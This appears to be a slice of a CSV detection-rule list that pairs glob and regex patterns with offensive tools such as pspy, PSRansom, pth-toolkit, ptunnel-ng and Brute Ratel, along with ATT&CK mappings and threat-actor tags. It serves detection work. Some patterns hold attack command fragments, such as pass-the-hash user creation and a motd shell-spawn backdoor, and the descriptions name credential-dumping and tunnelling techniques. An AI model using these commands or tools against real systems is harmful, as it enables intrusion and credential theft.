"*PSprofile.cpp*",".{0,1000}PSprofile\.cpp.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z","55717"
"*pspy - version: *",".{0,1000}pspy\s\-\sversion\:\s.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55718"
"*pspy*psscanner",".{0,1000}pspy.{0,1000}psscanner","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55719"
"*pspy32 -*",".{0,1000}pspy32\s\-.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55720"
"*pspy64 -*",".{0,1000}pspy64\s\-.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55721"
"*pspy64 -p*",".{0,1000}pspy64\s\-p.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55722"
"*pspy64 -r *",".{0,1000}pspy64\s\-r\s.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55723"
"*pspy-build:latest*",".{0,1000}pspy\-build\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55724"
"*pspy-development:latest*",".{0,1000}pspy\-development\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55725"
"*pspy-example:latest*",".{0,1000}pspy\-example\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55726"
"*pspy-master*",".{0,1000}pspy\-master.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55727"
"*pspy-testing:latest*",".{0,1000}pspy\-testing\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","55728"
"*PSRansom by @JoelGMSec*",".{0,1000}PSRansom\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","55729"
"*PSRansom.ps1*",".{0,1000}PSRansom\.ps1.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","1","N/A","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","55730"
"*PSRecon.ps1*",".{0,1000}PSRecon.{0,1000}","offensive_tool_keyword","PSRecon","PSRecon gathers data from a remote Windows host using PowerShell (v2 or later). organizes the data into folders. hashes all extracted data. hashes PowerShell and various system properties. and sends the data off to the security team. The data can be pushed to a share. sent over email. or retained locally.","T1059 - T1003 - T1556 - T1204","TA0002 - TA0009","N/A","N/A","Discovery","https://github.com/gfoss/PSRecon","1","1","N/A","N/A","9","5","486","105","2017-07-29T15:03:04Z","2015-08-03T05:43:38Z","55731"
"*psreflect *",".{0,1000}psreflect\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55732"
"*PSRunspace-InvokeRun-certutilCoded.txt*",".{0,1000}PSRunspace\-InvokeRun\-certutilCoded\.txt.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","55733"
"*pstgdump.exe*",".{0,1000}pstgdump\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55734"
"*PstPassword.exe*",".{0,1000}PstPassword\.exe.{0,1000}","offensive_tool_keyword","PstPassword","recover the PST passwords of Outlook","T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/pst_password.html","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","55735"
"*pstpassword.zip*",".{0,1000}pstpassword\.zip.{0,1000}","offensive_tool_keyword","PstPassword","recover the PST passwords of Outlook","T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/pst_password.html","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","55736"
"*pstpassword_setup.exe*",".{0,1000}pstpassword_setup\.exe.{0,1000}","offensive_tool_keyword","PstPassword","recover the PST passwords of Outlook","T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/pst_password.html","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","55737"
"*pstree.ps1*",".{0,1000}pstree\.ps1.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","55738"
"*PtC.exe challenge*",".{0,1000}PtC\.exe\schallenge.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","55745"
"*PtC.exe compare*",".{0,1000}PtC\.exe\scompare.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","55746"
"*PtC.exe inject*",".{0,1000}PtC\.exe\sinject.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","55747"
"*PtC.exe nthash *",".{0,1000}PtC\.exe\snthash\s.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","55748"
"*PtC.exe ping*",".{0,1000}PtC\.exe\sping.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","55749"
"*PtC.exe protect*",".{0,1000}PtC\.exe\sprotect.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","55750"
"*pth-net rpc group members *Domain admins*",".{0,1000}pth\-net\srpc\sgroup\smembers\s.{0,1000}Domain\sadmins.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55751"
"*pth-net rpc group members *Exchange Servers*",".{0,1000}pth\-net\srpc\sgroup\smembers\s.{0,1000}Exchange\sServers.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55752"
"*pth-net rpc password * -U * -S *",".{0,1000}pth\-net\srpc\spassword\s.{0,1000}\s\-U\s.{0,1000}\s\-S\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55753"
"*pth-net rpc user add * -U *-S *",".{0,1000}pth\-net\srpc\suser\sadd\s.{0,1000}\s\-U\s.{0,1000}\-S\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55754"
"*pth-rpcclient*",".{0,1000}pth\-rpcclient.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","55755"
"*pth-smbclient*",".{0,1000}pth\-smbclient.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","55756"
"*PTHSMBClientDelete*",".{0,1000}PTHSMBClientDelete.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","55757"
"*PTHSMBClientGet*",".{0,1000}PTHSMBClientGet.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","55758"
"*PTHSMBClientList*",".{0,1000}PTHSMBClientList.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","55759"
"*PTHSMBClientPut*",".{0,1000}PTHSMBClientPut.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","55760"
"*PTHSMBExec*",".{0,1000}PTHSMBExec.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","55761"
"*pth-smbget*",".{0,1000}pth\-smbget.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","55762"
"*pth-toolkit*",".{0,1000}pth\-toolkit.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","55763"
"*pth-toolkit-master.zip*",".{0,1000}pth\-toolkit\-master\.zip.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","55764"
"*pth-winexe*",".{0,1000}pth\-winexe.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","55765"
"*pth-wmic*",".{0,1000}pth\-wmic.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","55766"
"*PTHWMIExec*",".{0,1000}PTHWMIExec.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","55767"
"*pth-wmis*",".{0,1000}pth\-wmis.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","55768"
"*ptresearch/AttackDetection*",".{0,1000}ptresearch\/AttackDetection.{0,1000}","offensive_tool_keyword","POC","POC exploits - The Attack Detection Team searches for new vulnerabilities and 0-days. reproduces it and creates PoC exploits to understand how these security flaws work and how related attacks can be detected on the network layer. Additionally. we are interested in malware and hackers TTPs. so we develop Suricata rules for detecting all sorts of such activities.","T1210 - T1583 - T1586 - T1589 - T1596","TA0002 - TA0011 - TA0007","N/A","N/A","Exploitation tool","https://github.com/ptresearch/AttackDetection","1","1","N/A","N/A","N/A","10","1353","359","2022-08-31T09:26:21Z","2016-03-24T14:42:50Z","55769"
"*pts764gt354fder34fsqw45gdfsavadfgsfg.kraskula.com*",".{0,1000}pts764gt354fder34fsqw45gdfsavadfgsfg\.kraskula\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","55770"
"*ptunnel-client.log*",".{0,1000}ptunnel\-client\.log.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","#logfile","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55771"
"*ptunnel-data-recv*",".{0,1000}ptunnel\-data\-recv.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55772"
"*ptunnel-data-send*",".{0,1000}ptunnel\-data\-send.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55773"
"*ptunnel-master*",".{0,1000}ptunnel\-master.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55774"
"*ptunnel-ng *",".{0,1000}ptunnel\-ng\s.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55775"
"*ptunnel-ng.conf*",".{0,1000}ptunnel\-ng\.conf.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55776"
"*ptunnel-ng.git*",".{0,1000}ptunnel\-ng\.git.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55777"
"*ptunnel-ng.service*",".{0,1000}ptunnel\-ng\.service.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55778"
"*ptunnel-ng.te*",".{0,1000}ptunnel\-ng\.te.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55779"
"*ptunnel-ng-x64.exe*",".{0,1000}ptunnel\-ng\-x64\.exe.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55780"
"*ptunnel-ng-x64-dbg.exe*",".{0,1000}ptunnel\-ng\-x64\-dbg\.exe.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55781"
"*ptunnel-ng-x86.exe*",".{0,1000}ptunnel\-ng\-x86\.exe.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55782"
"*ptunnel-ng-x86-dbg.exe*",".{0,1000}ptunnel\-ng\-x86\-dbg\.exe.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55783"
"*ptunnel-server.log*",".{0,1000}ptunnel\-server\.log.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","#logfile","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","55784"
"*pty.spawn(""/bin/sh""* >> /etc/update-motd.d/00-header*",".{0,1000}pty\.spawn\(\""\/bin\/sh\"".{0,1000}\s\>\>\s\/etc\/update\-motd\.d\/00\-header.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","55785"
"*public class Keylogger*",".{0,1000}public\sclass\sKeylogger.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","55795"
"*public class LSASSDump*",".{0,1000}public\sclass\sLSASSDump.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","55796"
"*public class NTLMInjector*",".{0,1000}public\sclass\sNTLMInjector.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","0","N/A","N/A","10","2","167","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z","55797"
